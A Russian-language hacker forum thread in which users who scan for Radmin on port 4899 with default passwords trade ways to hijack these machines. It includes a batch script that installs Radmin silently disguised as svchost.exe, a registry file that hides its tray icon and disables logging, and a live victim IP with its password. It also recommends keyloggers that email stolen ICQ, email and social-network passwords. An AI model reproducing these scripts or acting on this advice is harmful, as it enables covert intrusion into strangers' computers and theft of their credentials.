дело в том что я сканировал IP на 4899 порт,нашел много открытых пароли по стандарту 1-8
так вот суть проблемы в том , что мне надо данный радмин удалить и залить свой не видемый.Радмин этот я удалял после чего заливал свой запускал при коннекте писало нет соединения и так постоянно.
Как поступить?Прошу вас о помощи
Заранее благодарен

Пиши как удалял, как потом свой заливал (через чего). Невидимый - это что имеется ввиду иконка в трее или в процессах невидимый. Тут вопросов больше чем ответов пока...

удалял через установку и удаление
всеровно значек в треи числился я в реестре удалил его значка не было
заранее был залит бекдор xcontrol
с помощью него свой заливал и запускал
да невидимый значит не в треи ни в диспетчере нету =)

а ты его хоть запустил???
всеровно значек в треи числился я в реестре удалил его значка не было
и после этого его не видно ни в трее ни в диспетчере?

да не видно,
свой я запустил как и писал через xcontrol
и не коннектит вообще =(((
выдает следуещее :
Соединение с 88.204.71.152
Ошибка TCP/IP или соединение закрыто.

Короче поступаешь так:
1.Устанавливаешь свой радмин.
2.Удаляешь чужой радин.
3.конектишься.
Это же все злементарно :)

ути умник какой xDD
свой устанавливаю вылетает Ошибка TCP/IP или соединение закрыто.
все =))
даже не успел удалить старый как такое вылетело
Хотя если ставить радмин мой через шелл то все нормально
тоесть я сделал выводы что каким то образом старый радмин мешает
но как быть в этой ситтуации?

ути умник какой xDD
свой устанавливаю вылетает Ошибка TCP/IP или соединение закрыто.
все =))
даже не успел удалить старый как такое вылетело
Хотя если ставить радмин мой через шелл то все нормально
тоесть я сделал выводы что каким то образом старый радмин мешает
но как быть в этой ситтуации?
Кинь сюда батник которым инсталишь.
И короче чувак хорош дедов тем более не своих тырить их же люди в разных целях используют, а ты нам подсираешь. Я сам когда ломаю серв всегда ставлю пароль 1-8. Потому-что о людях забочусь(тоесть о нас хакерах). Так что хорош фигней страдать. Или мы можем созлиться :mad: Ну ты понял ДА?

http://dump.ru/file/4118753

Если обычный радмин висит нафига еще один? Юзаю какой был до тебя.

http://dump.ru/file/4118753
Это твой

@echo off
rename core.dll svchost.exe
rename vmode.dll admdll.dll
rename vdrv.srt raddrv.dll
REG delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import settings.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

А ты уверен что файлы у тебя скопированы в папку windows?

да не видно,
свой я запустил как и писал через xcontrol
и не коннектит вообще =(((
выдает следуещее :
Соединение с 88.204.71.152
Ошибка TCP/IP или соединение закрыто.
Да действительно странная мессага

Соединение с 88.204.71.152
Ошибка TCP/IP или соединение закрыто

Сам пробовал коннектился :confused:

тот в треи числиться и в процессах а который у меня нет!

тот в треи числиться и в процессах а который у меня нет!
Кинька какой нибудь ип со стандартным пассом. Попробую сам перебью.

А радмин версия какая может просто иконку в три отрубить??? И если свой кидаеш процес переименуй и порт другой паставь.

ребят я очень далеко от вас живу очень )) дай бог чтоб получился коннект
а так без проблем
88.204.20.82
12345678


И вот еще ктонибудь может кейлоггер посоветовать хороший чтобы на мыло пароли высылал
а еще лучше что то типо Lan_keylogger
только бы с кряком )
заранее благодарствую

И вот еще ктонибудь может кейлоггер посоветовать хороший чтобы на мыло пароли высылал
а еще лучше что то типо Lan_keylogger
только бы с кряком )
заранее благодарствую
чувак для этого есть MPR

ребят я очень далеко от вас живу очень )) дай бог чтоб получился коннект
а так без проблем
88.204.20.82
12345678

Ты походу полохо усвоил что такие инет и TCP :) Да я подконнектился к твоему ип :) Блин пинг больно большой :)

[QUOTE=cheater_man]чувак для этого есть MPR

разве он пойдет на удаленке?

http://dump.ru/file/4118753

ошибка. нахимичил что-то

[QUOTE=cheater_man]чувак для этого есть MPR

разве он пойдет на удаленке?
На удаленке не пойдет. Тебе какие именно пассы нажны(от чего)?
Если что эти дедики используют для доступа в сеть этого провайдера.

мне бы кейлоггер чтобы воровать от аськи,мыла,одноклассники ну и тд =))
тоесть все то чем пользуються ламеры с открытыми 4899 портами xDDD
Желательно даже не чтоб на мыло кидал а чтоб в проге самой у меня и показывал куда он выходил когда логин пароль
тоесть так =)

Ну можно пароли по другому вытащить. Допустим из браузера итп.

келоггер интересен именно =)
ибо не один десяток людей надо обработать
да и не два =))
в общем людей тьма вот кейлоггеры накидал и ждешь
пусть даже антивирусы видят их это значения не имеет
отключу гг )

мне бы кейлоггер чтобы воровать от аськи,мыла,одноклассники ну и тд =))
тоесть все то чем пользуються ламеры с открытыми 4899 портами xDDD
Желательно даже не чтоб на мыло кидал а чтоб в проге самой у меня и показывал куда он выходил когда логин пароль
тоесть так =)
Конечно можно всадить Pinch 3 например(только его уже давно не обновляли, и его надо криптовать, тоесть проблем куча!).Ну а мне кажется лучше MPR.
Если например жертва пользуется OPERA, то нужно скопировать себе на комп файл wand.dat(вроде :) ) и открыть его MPR. Вообщето сам как хочешь делай, я например MPR пассы вскрывал :D

кроме пинча нету нечего стоящего?
а то доверия не внушает после прочтения отзывов

Да вот кстати

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4, b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

Скрывает радмин :D

спасибо
а на той машинке которую я в пример привел попробовать можешь??

кроме пинча нету нечего стоящего?
а то доверия не внушает после прочтения отзывов
Я хз давно кражей пассов не занимался. Я те говорю MPR в руки, тебе почти каждый 3-ий так скажет :)

это печально
но спасибо за помощь!!!

спасибо
а на той машинке которую я в пример привел попробовать можешь??
да смогу. Только надо смотреть ключи реестра.

ребят посоветуйте кейлоггер на удаленку пожалуйста
пусть даже старый , палиться антивирусами и прочии траблы
подойдет любой отсылающий пароли на мыло или же что еше лучше показывает в проге у тебя на мониторе так же как и в Lan_keylogger
благодарю заранее

AnyKEYLOGGEN - хороший мало чем палится
попробуй) :)

Lethal Keylogger FREE - отсылает отчеты на gmail, каспером и нодом не палится)))